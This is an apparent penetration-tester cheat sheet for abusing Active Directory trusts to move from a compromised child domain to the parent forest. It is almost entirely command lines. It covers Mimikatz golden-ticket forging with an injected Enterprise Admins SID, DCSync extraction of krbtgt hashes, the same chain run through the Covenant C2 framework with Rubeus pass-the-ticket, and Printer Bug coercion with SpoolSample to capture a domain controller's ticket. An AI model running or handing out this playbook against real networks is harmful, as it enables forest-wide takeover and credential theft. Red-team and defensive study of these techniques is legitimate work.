Trust

Use only FQDN instead of IP after loading the ticket !

Be aware of the double issue:

https://blogs.technet.microsoft.com/ashleymcglone/2016/08/30/powershell-remoting-kerberos-double-hop-solved-securely/

SID-Hoping golden ticket

SID hopping only works for two domain within the same forest since according to Microsoft All domain trusts in an Active Directory forest are two-way, transitive trusts

Mimikatz

Retrieve infos

SID to replace by 519: (New-Object System.Security.Principal.NTAccount("<domain>","krbtgt")).Translate([System.Security.Principal.SecurityIdentifier]).Value
krbtgt: dcsync <fqdn_child domain> <child_domain>\krbtgt
Get-DomainSID -Domain <fqdn_child_domain>
Get-NetComputer <DC_name>.<fqdn_cild_domain>

Forge and load ticket into memory

kerberos::golden /user:<ANY_CHILD_USER> /domain:<CHILD_DOMAIN> /sid:<CHILD_DOMAIN_SID> /krbtgt:<CHILD_DOMAIN_KRBTGT> /sids:<FULL_SID_PARENT_DOMAIN>-519 /ptt

DCSync

lsadump::dcsync /domain:target.evilcorp.com /user:target\krbtgt
Covenant - defeating the double hop issue

Make a token for a user in the compromised domain

MakeToken <user> <domain> '' 9

Forge the ticket

kerberos::golden /user:<ANY_CHILD_USER> /domain:<CHILD_DOMAIN> /sid:<CHILD_DOMAIN_SID> /krbtgt:<CHILD_DOMAIN_KRBTGT> /sids:<FULL_SID_PARENT_DOMAIN>-519 /export
echo "<B64>" | base64 -d > ticket.kirbi

Upload the ticket and inject it into memory

upload ticket.kirbi
Rubeus renew /ticket:ticket.kirbi /ptt

DCSync

lsadump::dcsync /domain:target.evilcorp.com /user:target\krbtgt

Printer bug

For the illustration (to make a link between both commands), the target DC is named dc02

Retrieve infos

powershell Get-DomainComputer -Domain <target.evilcorp.com>
.\Rubeus.exe monitor /interval:5 /filteruser:dc02$
.\SpoolSample_v4.5_x64.exe <dc02.target.evilcorp.com> <dc01.compromised.evilcorp.com>
cat tmp.b64 | tr -d '      ' | tr -d '\n' > ticket.b64
Rubeus.exe ptt /ticket:<b64>
lsadump::dcsync /domain:<target.evilcorp.com> /user:<target>\krbtgt